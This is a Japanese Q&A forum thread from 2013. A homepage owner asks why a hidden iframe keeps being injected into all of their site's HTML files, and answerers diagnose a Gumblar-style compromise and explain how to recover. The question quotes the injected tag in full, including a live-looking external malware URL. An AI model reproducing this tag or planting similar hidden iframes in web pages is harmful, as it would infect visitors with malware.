アプリ版:「スタンプのみでお礼する」機能のリリースについて

個人でHPページを開設しているますが、ある時間になるとHTMLの内容が勝手に書き換わってしまいます。
何かわかる方教えてください。

※ある時間になるとHPのサーバエリアのHTML全てに以下の文が勝手に挿入されてしまう。
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?i=3353573></i …

A 回答 (6件)

    • good
    • 0

No.2です



>>ウイルスバスタでも見つけられないんでしょうか?

最近のマルウエアは、アンチウイルスソフトに検出されないことを確認して配布というか拡散させています。
ですから、ウイルスバスタで検出されないことは、普通にあります。
さらにマルウエアを集めて、市販のアンチウイルスソフトの検出率テストをやっても、それらは検出率100%にならないのが普通です。
マルウエアは刻々と亜種に変わっていくものもありますから、現在、検出は極めて難しくなっていると思います。

そして最近は、コマンドサーバで指示されたときだけ、マルウエアとして稼動するものもあるといいます。
ですから、セキュリティの研究所が頑張っても、悪意のあるソフトかどうか、どんな動作をするのか?を調べるのは難しいんです。

最新の日経コンピュータの特集は、「もうサイバー攻撃は防げない」です。
現在は、サイバー攻撃を防ぐことは不可能と認識されています。
つまり、入り口対策しても、必ずサイバー攻撃で突破される。なので、感染した後、どう対処するか、という出口対策にセキュリティ対策の重点が移りつつあります。

P.S.
質問者さんは、2009年末から流行している「ガンブラー攻撃」を受けたと思います。

この回答への補足

ウイルスバスターは最新にしてウイルススキャンしてもウイルスは見つかりませんでした。OSも最新(Windows8)です。
これでもウイルスに感染してるんでしょうか?

補足日時:2013/06/04 17:21
    • good
    • 0

この記事のRSSフィードがウイルス検出されて大迷惑だったりします



いまさら手遅れですが自分で怪しいとわかってるならどこか一部伏せるとか
考えて投稿してほしいです
    • good
    • 1

どこのサイトなの?


フレームごとに自動的に広告を出すようにタグを追加するサイトは多いよ

有料会員じゃないと広告非表示に設定できないとか
    • good
    • 0

ヤバイですね。

ホームページ管理者である質問者さんのPCがマルウエアにヤラれてボットになっているか、アップロード用のID,PWが盗まれた状況ですよ!
書き換えられたものは、インナーフレームで、質問者さんのHPがマルウエア配布元となり、閲覧した人たちが、マルウエアに感染してしまっている可能性があります。
マルウエア(ウイルス)配布の有名な手法です。

緊急にHPを閉じて、アップロード用PWの変更と、ご自身のPCをリカバリーしてください。
また、IPAにマルウエア被害を報告してください。

https://www.ipa.go.jp/security/outline/todoke-to …

ちなみに、今年3月ことから、サイバー攻撃が酷くなっています。巨大サイト、有名サイトだけでなく、小さな個人のHPまでもターゲットになっているように思えます。

この回答への補足

PCにはウイルスバスタークラウドを入れていますが、ウイルス感染は見つけられません。
ウイルスバスタでも見つけられないんでしょうか?

補足日時:2013/06/02 16:29
    • good
    • 0

もしかしてツイッターと連動する機能を実装していませんか?



私はHP開設経験が無いのですが、
お使いのサーバ会社の方に問い合せる方が早いと思います。
    • good
    • 0

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!